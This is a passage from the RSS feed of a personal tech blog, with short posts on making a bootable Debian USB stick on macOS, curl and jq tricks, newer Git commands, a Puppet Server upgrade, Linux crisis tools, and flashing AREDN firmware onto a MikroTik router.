  525. ]]></content:encoded>
  526.  </item>
  527.  
  528.  <item>
  529.    <title>Create a bootable Debian USB stick on macOS</title>
  530.    <link>https://blog.x-way.org/Linux/2024/05/05/Create-a-bootable-Debian-USB-stick-on-macOS.html</link>
  531.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324353</guid>
  532.    <dc:creator>Andreas Jaggi</dc:creator>
  533.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  534.    <pubDate>Sun, 05 May 2024 14:39:00 +0000</pubDate>
  535.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  536.    <description><![CDATA[<p>Needed to create a bootable Debian USB stick for some maintenance on one of my computers.<br>Here are the steps so I won't have to search for them the next time :-)</p>
  537. <ol>
  538. <li>Download the <a href="https://www.debian.org/CD/live/" title="">Debian live CD image</a></li>
  539. <li>Connect your USB stick and find its device location (/dev/diskX) with: <pre>sudo diskutil list</pre></li>
  540. <li>If needed unmount your USB stick: <pre>sudo diskutil unmountdisk /dev/diskX</pre></li>
  541. <li>Write the downloaded image onto the USB stick: <pre>sudo dd if=./debian-live-12.5.0-amd64-standard.iso of=/dev/diskX bs=1m</pre></li>
  542. </ol>
  543. ]]></description>
  544.    <content:encoded><![CDATA[<p>Needed to create a bootable Debian USB stick for some maintenance on one of my computers.<br>Here are the steps so I won't have to search for them the next time :-)</p>
  545. <ol>
  546. <li>Download the <a href="https://www.debian.org/CD/live/" title="">Debian live CD image</a></li>
  547. <li>Connect your USB stick and find its device location (/dev/diskX) with: <pre>sudo diskutil list</pre></li>
  548. <li>If needed unmount your USB stick: <pre>sudo diskutil unmountdisk /dev/diskX</pre></li>
  549. <li>Write the downloaded image onto the USB stick: <pre>sudo dd if=./debian-live-12.5.0-amd64-standard.iso of=/dev/diskX bs=1m</pre></li>
  550. </ol>
  551. ]]></content:encoded>
  552.  </item>
  553.  
  554.  <item>
  555.    <title>Tiny Fragments</title>
  556.    <link>https://blog.x-way.org/Misc/2024/04/24/Tiny-Fragments.html</link>
  557.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324352</guid>
  558.    <dc:creator>Andreas Jaggi</dc:creator>
  559.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  560.    <pubDate>Wed, 24 Apr 2024 21:58:00 +0000</pubDate>
  561.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  562.    <description><![CDATA[<p><a href="https://daz.itch.io/tiny-fragments" title="Tiny Fragments by Daniel Moreno">Tiny Fragments</a> is a fun little puzzle game made by <a href="https://www.dazlog.com/" title="Dazlog">Daniel Moreno</a> (<a href="https://gigold.me/links/game-tiny-fragments" title="Game: Tiny Fragments | Thomas Gigold">via</a>)</p>
  563. <img src="https://blog.x-way.org/images/tiny-fragments.png" height="230" width="400" alt="Tiny Fragments - The Tree">
  564. ]]></description>
  565.    <content:encoded><![CDATA[<p><a href="https://daz.itch.io/tiny-fragments" title="Tiny Fragments by Daniel Moreno">Tiny Fragments</a> is a fun little puzzle game made by <a href="https://www.dazlog.com/" title="Dazlog">Daniel Moreno</a> (<a href="https://gigold.me/links/game-tiny-fragments" title="Game: Tiny Fragments | Thomas Gigold">via</a>)</p>
  566. <img src="https://blog.x-way.org/images/tiny-fragments.png" height="230" width="400" alt="Tiny Fragments - The Tree">
  567. ]]></content:encoded>
  568.  </item>
  569.  
  570.  <item>
  571.    <title>Testing HTML with modern CSS</title>
  572.    <link>https://blog.x-way.org/Webdesign/2024/04/23/Testing-HTML-with-modern-CSS.html</link>
  573.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324351</guid>
  574.    <dc:creator>Andreas Jaggi</dc:creator>
  575.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  576.    <pubDate>Tue, 23 Apr 2024 00:30:00 +0000</pubDate>
  577.    <category domain="https://blog.x-way.org/Webdesign">Webdesign</category>
  578.    <description><![CDATA[<p>Interesting article explaining how to test HTML with visual CSS highlighting: <a href="https://heydonworks.com/article/testing-html-with-modern-css/" title="Testing HTML with modern CSS: HeydonWorks">Testing HTML with modern CSS</a> (<a href="https://couchblog.de/blog/2024/04/22/links/" title="Links | Couchblog">via</a>)</p>
  579. ]]></description>
  580.    <content:encoded><![CDATA[<p>Interesting article explaining how to test HTML with visual CSS highlighting: <a href="https://heydonworks.com/article/testing-html-with-modern-css/" title="Testing HTML with modern CSS: HeydonWorks">Testing HTML with modern CSS</a> (<a href="https://couchblog.de/blog/2024/04/22/links/" title="Links | Couchblog">via</a>)</p>
  581. ]]></content:encoded>
  582.  </item>
  583.  
  584.  <item>
  585.    <title>Print HTTP Headers and Pretty-Print JSON Response</title>
  586.    <link>https://blog.x-way.org/Linux/2024/04/15/Print-HTTP-Headers-and-Pretty-Print-JSON-Response.html</link>
  587.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324350</guid>
  588.    <dc:creator>Andreas Jaggi</dc:creator>
  589.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  590.    <pubDate>Mon, 15 Apr 2024 09:37:00 +0000</pubDate>
  591.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  592.    <description><![CDATA[<p>In the <a href="https://susam.net/pretty-print-json-response-with-http-headers.html" title="Print HTTP Headers and Pretty-Print JSON Response - Susam Pal">Print HTTP Headers and Pretty-Print JSON Response</a> post, <a href="https://susam.net/" title="Susam Pal">Susam Pal</a> shows a nice trick to pretty-print JSON output with jq from curl while also showing the HTTP response headers (using stderr):</p>
  593. <pre>curl -sSD /dev/stderr https://some-URL-returning-JSON | jq .</pre>
  594. ]]></description>
  595.    <content:encoded><![CDATA[<p>In the <a href="https://susam.net/pretty-print-json-response-with-http-headers.html" title="Print HTTP Headers and Pretty-Print JSON Response - Susam Pal">Print HTTP Headers and Pretty-Print JSON Response</a> post, <a href="https://susam.net/" title="Susam Pal">Susam Pal</a> shows a nice trick to pretty-print JSON output with jq from curl while also showing the HTTP response headers (using stderr):</p>
  596. <pre>curl -sSD /dev/stderr https://some-URL-returning-JSON | jq .</pre>
  597. ]]></content:encoded>
  598.  </item>
  599.  
  600.  <item>
  601.    <title>Modern Git Commands and Features You Should Be Using</title>
  602.    <link>https://blog.x-way.org/Coding/2024/04/13/Modern-Git-Commands-and-Features-You-Should-Be-Using.html</link>
  603.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324349</guid>
  604.    <dc:creator>Andreas Jaggi</dc:creator>
  605.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  606.    <pubDate>Sat, 13 Apr 2024 20:37:00 +0000</pubDate>
  607.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  608.    <description><![CDATA[<p><a href="https://martinheinz.dev/blog/109" title="Modern Git Commands and Features You Should Be Using | Martin Heinz | Personal Website &amp; Blog">Modern Git Commands and Features You Should Be Using</a> &mdash; a short article from <a href="https://martinheinz.dev/" title="Martin Heinz | Personal Website &amp; Blog">Martin Heinz</a> about some new-ish (&gt;2018) features in <a href="https://git-scm.com/" title="Git">Git</a>, that 'can make your life so much easier'.</p>
  609. <p>TL;DR:</p>
  610. <ul>
  611. <li><code>git switch &lt;branchname&gt;</code></li>
  612. <li><code>git restore --staged &lt;somefile&gt;</code></li>
  613. <li><code>git restore --source &lt;commit&gt; &lt;somefile&gt;</code></li>
  614. <li><code>git sparse-checkout</code></li>
  615. <li><code>git worktree</code></li>
  616. <li><code>git bisect</code></li>
  617. </ul>
  618. <p>Similar post from five years ago: <a href="https://blog.x-way.org/Coding/2019/05/25/More-productive-Git.html" title="More productive Git - x-log">More productive Git</a></p>
  619. ]]></description>
  620.    <content:encoded><![CDATA[<p><a href="https://martinheinz.dev/blog/109" title="Modern Git Commands and Features You Should Be Using | Martin Heinz | Personal Website &amp; Blog">Modern Git Commands and Features You Should Be Using</a> &mdash; a short article from <a href="https://martinheinz.dev/" title="Martin Heinz | Personal Website &amp; Blog">Martin Heinz</a> about some new-ish (&gt;2018) features in <a href="https://git-scm.com/" title="Git">Git</a>, that 'can make your life so much easier'.</p>
  621. <p>TL;DR:</p>
  622. <ul>
  623. <li><code>git switch &lt;branchname&gt;</code></li>
  624. <li><code>git restore --staged &lt;somefile&gt;</code></li>
  625. <li><code>git restore --source &lt;commit&gt; &lt;somefile&gt;</code></li>
  626. <li><code>git sparse-checkout</code></li>
  627. <li><code>git worktree</code></li>
  628. <li><code>git bisect</code></li>
  629. </ul>
  630. <p>Similar post from five years ago: <a href="https://blog.x-way.org/Coding/2019/05/25/More-productive-Git.html" title="More productive Git - x-log">More productive Git</a></p>
  631. ]]></content:encoded>
  632.  </item>
  633.  
  634.  <item>
  635.    <title>NTP IPs</title>
  636.    <link>https://blog.x-way.org/Networking/2024/04/11/NTP-IPs.html</link>
  637.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324348</guid>
  638.    <dc:creator>Andreas Jaggi</dc:creator>
  639.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  640.    <pubDate>Thu, 11 Apr 2024 21:41:00 +0000</pubDate>
  641.    <category domain="https://blog.x-way.org/Networking">Networking</category>
  642.    <description><![CDATA[<p>This <a href="https://rachelbythebay.com/w/2024/04/10/rtc/" title="Going in circles without a real-time clock">post</a> from Rachel, reminded me of my own struggle with a Raspberry Pi and time (and yes, I did run into the same DNSSEC problem).<br>I first tried a RTC shield, but this didn't fully solve all problems.</p>
  643. <p>My workaround in the end is to use two fixed IP addresses in ntp.conf in additon to the usual pool servers.<br>Thanks ${previous employer} for not changing the IPs of your public NTP servers so far :-)</p>
  644. ]]></description>
  645.    <content:encoded><![CDATA[<p>This <a href="https://rachelbythebay.com/w/2024/04/10/rtc/" title="Going in circles without a real-time clock">post</a> from Rachel, reminded me of my own struggle with a Raspberry Pi and time (and yes, I did run into the same DNSSEC problem).<br>I first tried a RTC shield, but this didn't fully solve all problems.</p>
  646. <p>My workaround in the end is to use two fixed IP addresses in ntp.conf in additon to the usual pool servers.<br>Thanks ${previous employer} for not changing the IPs of your public NTP servers so far :-)</p>
  647. ]]></content:encoded>
  648.  </item>
  649.  
  650.  <item>
  651.    <title>Back on native IPv6</title>
  652.    <link>https://blog.x-way.org/Networking/2024/04/10/Back-on-native-IPv6.html</link>
  653.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324347</guid>
  654.    <dc:creator>Andreas Jaggi</dc:creator>
  655.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  656.    <pubDate>Wed, 10 Apr 2024 20:28:00 +0000</pubDate>
  657.    <category domain="https://blog.x-way.org/Networking">Networking</category>
  658.    <description><![CDATA[<p>As hinted at in my <a href="https://blog.x-way.org/Networking/2024/04/10/SixSpotting-still-going-on.html" title="SixSpotting still going on - x-log">previous post</a>, Solnet is delivering native IPv6 Internet again.</p>
  659. <p>Shortly after 23h on March 26th there was a brief interruption of the Internet uplink and afterwards my router started receiving an IPv6 address again.<br>My <a href="https://blog.x-way.org/Networking/2024/02/25/Tunnelbroker-to-the-rescue.html" title="Tunnelbroker to the rescue - x-log">support ticket with Solnet</a> is still unanswered, but at least IPv6 is back :-)</p>
  660. ]]></description>
  661.    <content:encoded><![CDATA[<p>As hinted at in my <a href="https://blog.x-way.org/Networking/2024/04/10/SixSpotting-still-going-on.html" title="SixSpotting still going on - x-log">previous post</a>, Solnet is delivering native IPv6 Internet again.</p>
  662. <p>Shortly after 23h on March 26th there was a brief interruption of the Internet uplink and afterwards my router started receiving an IPv6 address again.<br>My <a href="https://blog.x-way.org/Networking/2024/02/25/Tunnelbroker-to-the-rescue.html" title="Tunnelbroker to the rescue - x-log">support ticket with Solnet</a> is still unanswered, but at least IPv6 is back :-)</p>
  663. ]]></content:encoded>
  664.  </item>
  665.  
  666.  <item>
  667.    <title>SixSpotting still going on</title>
  668.    <link>https://blog.x-way.org/Networking/2024/04/10/SixSpotting-still-going-on.html</link>
  669.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324346</guid>
  670.    <dc:creator>Andreas Jaggi</dc:creator>
  671.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  672.    <pubDate>Wed, 10 Apr 2024 19:05:00 +0000</pubDate>
  673.    <category domain="https://blog.x-way.org/Networking">Networking</category>
  674.    <description><![CDATA[<p>While browsing through the archives I stumbled upon the <a href="https://blog.x-way.org/Networking/2014/11/02/SixSpotting.html" title="SixSpotting - x-log">SixSpotting post</a> from 2014.<br>Turns out <a href="https://game.flyingpenguintech.org/" title="SixSpotting">the game</a> is still working and after some failed attempts I managed to remember my account name and log in.<br>I guess it must look quite strange to see a burst of new checkins after almost 10 years &#x1F604;</p>
  675. <p><img src="https://blog.x-way.org/images/sixspotting-2024.png" width="420" height="87" alt="My last 5 SixSpotting checkins" /></p>
  676. ]]></description>
  677.    <content:encoded><![CDATA[<p>While browsing through the archives I stumbled upon the <a href="https://blog.x-way.org/Networking/2014/11/02/SixSpotting.html" title="SixSpotting - x-log">SixSpotting post</a> from 2014.<br>Turns out <a href="https://game.flyingpenguintech.org/" title="SixSpotting">the game</a> is still working and after some failed attempts I managed to remember my account name and log in.<br>I guess it must look quite strange to see a burst of new checkins after almost 10 years &#x1F604;</p>
  678. <p><img src="https://blog.x-way.org/images/sixspotting-2024.png" width="420" height="87" alt="My last 5 SixSpotting checkins" /></p>
  679. ]]></content:encoded>
  680.  </item>
  681.  
  682.  <item>
  683.    <title>humans.txt</title>
  684.    <link>https://blog.x-way.org/Webdesign/2024/04/07/humans-txt.html</link>
  685.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324345</guid>
  686.    <dc:creator>Andreas Jaggi</dc:creator>
  687.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  688.    <pubDate>Sun, 07 Apr 2024 19:10:00 +0000</pubDate>
  689.    <category domain="https://blog.x-way.org/Webdesign">Webdesign</category>
  690.    <description><![CDATA[<p>After following a couple links from the article linked in the previous blogpost, I ended up reading the <a href="https://shellsharks.com/notes/2023/08/15/website-component-checklist" title="Website Component Checklis">Website Component Checklist</a> from <a href="https://shellsharks.com/about" title="Mike Sass">Mike Sass</a>.<br>It provides again a lot of inspiration for things to add to my weblog.<br>What intrigued me today on the list was <a href="https://web.archive.org/web/20240330061550/https://humanstxt.org/" title="Humans TXT: We Are People, Not Machines.">humans.txt</a>, which is an initiative for knowing the people behing a website.</p>
  691. <p>Thus I've now added the following <a href="https://blog.x-way.org/humans.txt" title="x-log - Humans TXT">humans.txt</a>.</p>
  692. ]]></description>
  693.    <content:encoded><![CDATA[<p>After following a couple links from the article linked in the previous blogpost, I ended up reading the <a href="https://shellsharks.com/notes/2023/08/15/website-component-checklist" title="Website Component Checklis">Website Component Checklist</a> from <a href="https://shellsharks.com/about" title="Mike Sass">Mike Sass</a>.<br>It provides again a lot of inspiration for things to add to my weblog.<br>What intrigued me today on the list was <a href="https://web.archive.org/web/20240330061550/https://humanstxt.org/" title="Humans TXT: We Are People, Not Machines.">humans.txt</a>, which is an initiative for knowing the people behing a website.</p>
  694. <p>Thus I've now added the following <a href="https://blog.x-way.org/humans.txt" title="x-log - Humans TXT">humans.txt</a>.</p>
  695. ]]></content:encoded>
  696.  </item>
  697.  
  698.  <item>
  699.    <title>100 more things you can do with your personal website</title>
  700.    <link>https://blog.x-way.org/Misc/2024/04/07/100-more-things-you-can-do-with-your-personal-website.html</link>
  701.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324344</guid>
  702.    <dc:creator>Andreas Jaggi</dc:creator>
  703.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  704.    <pubDate>Sun, 07 Apr 2024 17:32:00 +0000</pubDate>
  705.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  706.    <description><![CDATA[<p><a href="https://jamesg.blog/2024/03/10/100-more-personal-website-ideas/" title="100 (more) things you can do with your personal website | James' Coffee Blog">100 more things you can do with your personal website</a> &mdash; a follow-up to the <a href="https://blog.x-way.org/Misc/2024/03/07/100-things-you-can-do-on-your-personal-website.html" title="x-log - 100 things you can do on your personal website">popular post</a> from last month :-)</p>
  707. ]]></description>
  708.    <content:encoded><![CDATA[<p><a href="https://jamesg.blog/2024/03/10/100-more-personal-website-ideas/" title="100 (more) things you can do with your personal website | James' Coffee Blog">100 more things you can do with your personal website</a> &mdash; a follow-up to the <a href="https://blog.x-way.org/Misc/2024/03/07/100-things-you-can-do-on-your-personal-website.html" title="x-log - 100 things you can do on your personal website">popular post</a> from last month :-)</p>
  709. ]]></content:encoded>
  710.  </item>
  711.  
  712.  <item>
  713.    <title>Dog Poo Golf</title>
  714.    <link>https://blog.x-way.org/Misc/2024/04/03/Dog-Poo-Golf.html</link>
  715.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324343</guid>
  716.    <dc:creator>Andreas Jaggi</dc:creator>
  717.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  718.    <pubDate>Wed, 03 Apr 2024 08:03:00 +0000</pubDate>
  719.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  720.    <description><![CDATA[<p><img src="https://blog.x-way.org/images/dog-poo-golf.png" width="480" height="347" alt="Dog Poo Golf start screen" /></p>
  721. <p><a href="https://vole.wtf/dog-poo-golf/" title="Dog Poo Golf &#x1F436;&#x1F4A9;&#x26F3;">Dog Poo Golf</a>, a Wii Sports Golf-style browser game (with the music!) where you fling dog poop bags into a garbage can. &#x1F436;&#x1F4A9;&#x26F3; (<a href="https://kottke.org/24/04/0044297-dog-poo-golf-a-wii" title="kottke.org - Dog Poo Golf">via kottke.org</a>)</p>
  722. ]]></description>
  723.    <content:encoded><![CDATA[<p><img src="https://blog.x-way.org/images/dog-poo-golf.png" width="480" height="347" alt="Dog Poo Golf start screen" /></p>
  724. <p><a href="https://vole.wtf/dog-poo-golf/" title="Dog Poo Golf &#x1F436;&#x1F4A9;&#x26F3;">Dog Poo Golf</a>, a Wii Sports Golf-style browser game (with the music!) where you fling dog poop bags into a garbage can. &#x1F436;&#x1F4A9;&#x26F3; (<a href="https://kottke.org/24/04/0044297-dog-poo-golf-a-wii" title="kottke.org - Dog Poo Golf">via kottke.org</a>)</p>
  725. ]]></content:encoded>
  726.  </item>
  727.  
  728.  <item>
  729.    <title>Puppet updated!</title>
  730.    <link>https://blog.x-way.org/Linux/2024/03/30/Puppet-updated.html</link>
  731.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324342</guid>
  732.    <dc:creator>Andreas Jaggi</dc:creator>
  733.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  734.    <pubDate>Sat, 30 Mar 2024 13:03:00 +0000</pubDate>
  735.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  736.    <description><![CDATA[<p>Yay! Successfully updated my <a href="https://www.puppet.com/docs/puppet/8/server/about_server.html" title="About Puppet Server">Puppet Server</a> setup from 5.3.7 to 8.4.0 &#x1f389;</p>
  737. <p>It was quite a step (5.3.7 was released in January 2019) and as expected 3 major version bumps came with a couple changes.</p>
  738. <p>I opted to re-create the PuppetDB and CA stores from scratch (to avoid having to migrate 5 years of data schema changes, and the CA cert is now also valid for a couple more years again).</p>
  739. <p>To make the old manifests and modules work with the new versions, quite some effort was needed. This included rewriting some no longer maintained modules to use newer stdlib and concat libraries, updating a couple modules from the puppet forge (with the bonus that my puppet server runs airgapped and I had to use the download-tar-copy-extract way to install them) and fixing no longer valid syntax here and there in my custom manifests. Overall I spent about 5 hours on it (and have now a recurring reminder to update puppet more often to make this process less painful).</p>
  740. <p>Helpful as usual were the resources from <a href="https://voxpupuli.org/" title="Vox Pupuli">Vox Pupuli</a>, in particular the <a href="https://hub.docker.com/r/voxpupuli/container-puppetserver" title="Voxpupuli Puppet Server container">Puppet Server</a> and <a href="https://hub.docker.com/r/voxpupuli/container-puppetdb" title="Voxpupuli PuppetDB container">PuppetDB</a> Docker images and the <a href="https://github.com/voxpupuli/crafty/" title="voxpupuli/crafty: CRAFTY - Containerized Resources And Funky Tools (in) YAML">CRAFTY repo</a> which contains a fully self-contained Docker Compose setup very similar to what I'm running.</p>
  741. <p>Some commands that came in handy:</p>
  742. <p><code>puppet config print ssldir --section agent</code><br>
  743. Returns the path of the TLS config folder on the client. Useful during a CA change (where you <code>rm -rf</code> the whole folder and then request a new TLS certificate).</p>
  744. <p><code>puppet agent -t --noop</code><br>
  745. Dry-run the changes on the client (it does request a new TLS cert though!). Shows a nice diff of the changes it would do to files, helpful to validate that a manifest still behaves the same in the new version.</p>
  746. ]]></description>
  747.    <content:encoded><![CDATA[<p>Yay! Successfully updated my <a href="https://www.puppet.com/docs/puppet/8/server/about_server.html" title="About Puppet Server">Puppet Server</a> setup from 5.3.7 to 8.4.0 &#x1f389;</p>
  748. <p>It was quite a step (5.3.7 was released in January 2019) and as expected 3 major version bumps came with a couple changes.</p>
  749. <p>I opted to re-create the PuppetDB and CA stores from scratch (to avoid having to migrate 5 years of data schema changes, and the CA cert is now also valid for a couple more years again).</p>
  750. <p>To make the old manifests and modules work with the new versions, quite some effort was needed. This included rewriting some no longer maintained modules to use newer stdlib and concat libraries, updating a couple modules from the puppet forge (with the bonus that my puppet server runs airgapped and I had to use the download-tar-copy-extract way to install them) and fixing no longer valid syntax here and there in my custom manifests. Overall I spent about 5 hours on it (and have now a recurring reminder to update puppet more often to make this process less painful).</p>
  751. <p>Helpful as usual were the resources from <a href="https://voxpupuli.org/" title="Vox Pupuli">Vox Pupuli</a>, in particular the <a href="https://hub.docker.com/r/voxpupuli/container-puppetserver" title="Voxpupuli Puppet Server container">Puppet Server</a> and <a href="https://hub.docker.com/r/voxpupuli/container-puppetdb" title="Voxpupuli PuppetDB container">PuppetDB</a> Docker images and the <a href="https://github.com/voxpupuli/crafty/" title="voxpupuli/crafty: CRAFTY - Containerized Resources And Funky Tools (in) YAML">CRAFTY repo</a> which contains a fully self-contained Docker Compose setup very similar to what I'm running.</p>
  752. <p>Some commands that came in handy:</p>
  753. <p><code>puppet config print ssldir --section agent</code><br>
  754. Returns the path of the TLS config folder on the client. Useful during a CA change (where you <code>rm -rf</code> the whole folder and then request a new TLS certificate).</p>
  755. <p><code>puppet agent -t --noop</code><br>
  756. Dry-run the changes on the client (it does request a new TLS cert though!). Shows a nice diff of the changes it would do to files, helpful to validate that a manifest still behaves the same in the new version.</p>
  757. ]]></content:encoded>
  758.  </item>
  759.  
  760.  <item>
  761.    <title>Linux Crisis Tools</title>
  762.    <link>https://blog.x-way.org/Linux/2024/03/25/Linux-Crisis-Tools.html</link>
  763.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324341</guid>
  764.    <dc:creator>Andreas Jaggi</dc:creator>
  765.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  766.    <pubDate>Mon, 25 Mar 2024 21:45:00 +0000</pubDate>
  767.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  768.    <description><![CDATA[<p><a href="https://www.brendangregg.com/" title="Brendan Gregg's Homepage">Brendan Gregg</a> posted the following <a href="https://www.brendangregg.com/blog/2024-03-24/linux-crisis-tools.html" title="Linux Crisis Tools">list of 'crisis tools'</a> which you should install on your Linux servers by default (so they are available when an incident happens).</p>
  769. <table>
  770. <tr><th>Package</th><th>Provides</th><th>Notes</th></tr>
  771. <tr><td>procps</td><td>ps(1), vmstat(8), uptime(1), top(1)</td><td>basic stats</td></tr>
  772. <tr><td>util-linux</td><td>dmesg(1), lsblk(1), lscpu(1)</td><td>system log, device info</td></tr>
  773. <tr><td>sysstat</td><td>iostat(1), mpstat(1), pidstat(1), sar(1)</td><td>device stats</td></tr>
  774. <tr><td>iproute2</td><td>ip(8), ss(8), nstat(8), tc(8)</td><td>preferred net tools</td></tr>
  775. <tr><td>numactl</td><td>numastat(8)</td><td>NUMA stats</td></tr>
  776. <tr><td>tcpdump</td><td>tcpdump(8)</td><td>Network sniffer</td></tr>
  777. <tr><td>linux-tools-common<br>linux-tools-$(uname -r)</td><td>perf(1), turbostat(8)</td><td>profiler and PMU stats</td></tr>
  778. <tr><td>bpfcc-tools (bcc)</td><td>opensnoop(8), execsnoop(8), runqlat(8), softirqs(8),<br>hardirqs(8), ext4slower(8), ext4dist(8), biotop(8),<br>biosnoop(8), biolatency(8), tcptop(8), tcplife(8),<br>trace(8), argdist(8), funccount(8), profile(8), etc.</td><td>canned eBPF tools[1]</td></tr>
  779. <tr><td>bpftrace</td><td>bpftrace, basic versions of opensnoop(8),<br>execsnoop(8), runqlat(8), biosnoop(8), etc.</td><td>eBPF scripting[1]</td></tr>
  780. <tr><td>trace-cmd</td><td>trace-cmd(1)</td><td>Ftrace CLI</td></tr>
  781. <tr><td>nicstat</td><td>nicstat(1)</td><td>net device stats</td></tr>
  782. <tr><td>ethtool</td><td>ethtool(8)</td><td>net device info</td></tr>
  783. <tr><td>tiptop</td><td>tiptop(1)</td><td>PMU/PMC top</td></tr>
  784. <tr><td>cpuid</td><td>cpuid(1)</td><td>CPU details</td></tr>
  785. <tr><td>msr-tools</td><td>rdmsr(8), wrmsr(8)</td><td>CPU digging</td></tr>
  786. </table>
  787. ]]></description>
  788.    <content:encoded><![CDATA[<p><a href="https://www.brendangregg.com/" title="Brendan Gregg's Homepage">Brendan Gregg</a> posted the following <a href="https://www.brendangregg.com/blog/2024-03-24/linux-crisis-tools.html" title="Linux Crisis Tools">list of 'crisis tools'</a> which you should install on your Linux servers by default (so they are available when an incident happens).</p>
  789. <table>
  790. <tr><th>Package</th><th>Provides</th><th>Notes</th></tr>
  791. <tr><td>procps</td><td>ps(1), vmstat(8), uptime(1), top(1)</td><td>basic stats</td></tr>
  792. <tr><td>util-linux</td><td>dmesg(1), lsblk(1), lscpu(1)</td><td>system log, device info</td></tr>
  793. <tr><td>sysstat</td><td>iostat(1), mpstat(1), pidstat(1), sar(1)</td><td>device stats</td></tr>
  794. <tr><td>iproute2</td><td>ip(8), ss(8), nstat(8), tc(8)</td><td>preferred net tools</td></tr>
  795. <tr><td>numactl</td><td>numastat(8)</td><td>NUMA stats</td></tr>
  796. <tr><td>tcpdump</td><td>tcpdump(8)</td><td>Network sniffer</td></tr>
  797. <tr><td>linux-tools-common<br>linux-tools-$(uname -r)</td><td>perf(1), turbostat(8)</td><td>profiler and PMU stats</td></tr>
  798. <tr><td>bpfcc-tools (bcc)</td><td>opensnoop(8), execsnoop(8), runqlat(8), softirqs(8),<br>hardirqs(8), ext4slower(8), ext4dist(8), biotop(8),<br>biosnoop(8), biolatency(8), tcptop(8), tcplife(8),<br>trace(8), argdist(8), funccount(8), profile(8), etc.</td><td>canned eBPF tools[1]</td></tr>
  799. <tr><td>bpftrace</td><td>bpftrace, basic versions of opensnoop(8),<br>execsnoop(8), runqlat(8), biosnoop(8), etc.</td><td>eBPF scripting[1]</td></tr>
  800. <tr><td>trace-cmd</td><td>trace-cmd(1)</td><td>Ftrace CLI</td></tr>
  801. <tr><td>nicstat</td><td>nicstat(1)</td><td>net device stats</td></tr>
  802. <tr><td>ethtool</td><td>ethtool(8)</td><td>net device info</td></tr>
  803. <tr><td>tiptop</td><td>tiptop(1)</td><td>PMU/PMC top</td></tr>
  804. <tr><td>cpuid</td><td>cpuid(1)</td><td>CPU details</td></tr>
  805. <tr><td>msr-tools</td><td>rdmsr(8), wrmsr(8)</td><td>CPU digging</td></tr>
  806. </table>
  807. ]]></content:encoded>
  808.  </item>
  809.  
  810.  <item>
  811.    <title>Installing the AREDN firmware on a MikroTik hAP ac lite</title>
  812.    <link>https://blog.x-way.org/Radio/2024/03/24/Installing-the-AREDN-firmware-on-a-MikroTik-hAP-ac-lite.html</link>
  813.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324340</guid>
  814.    <dc:creator>Andreas Jaggi</dc:creator>
  815.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  816.    <pubDate>Sun, 24 Mar 2024 14:26:00 +0000</pubDate>
  817.    <category domain="https://blog.x-way.org/Radio">Radio</category>
  818.    <description><![CDATA[<p>At the recent <a href="http://hb9tf.ch" title="Tango Foxtrott Wireless Society HB9TF">HB9TF</a> AGM fellow radio amateur <a href="https://medium.com/@hb9gvm" title="Martin Suess (HB9GVM)">HB9GVM</a> gave an introductory presentation about <a href="https://www.arednmesh.org/" title="Amateur Radio Emergency Data Network">AREDN</a>.</p>
  819. <p>Motivated by this, I ordered a <a href="https://mikrotik.com/product/RB952Ui-5ac2nD" title="MikroTik hAP ac lite">MikroTik hAP ac lite</a> and installed the AREDN firmware on it.<br>The following are my notes of the installation process.</p>
  820. <ol>
  821. <li>Download the firmware images for the MikroTik hAP ac lite from <a href="http://downloads.arednmesh.org/afs/www/" title="AREDN Firmware Selector">http://downloads.arednmesh.org/afs/www/</a> (both the *kernel.bin and *sysupgrade.bin are needed)</li>
  822. <li>Install <a href="https://thekelleys.org.uk/dnsmasq/doc.html" title="Dnsmasq - network services for small networks">Dnsmasq</a> as a PXE server on Mac OS: <pre>brew install dnsmasq</pre></li>
  823. <li>Setup the *kernel.bin for PXE: <pre>mkdir tftp-root
  824. cp $HOME/Downloads/aredn-3.23.12.0-ath79-mikrotik-mikrotik_routerboard-952ui-5ac2nd-initramfs-kernel.bin tftp-root/rb.elf</pre></li>
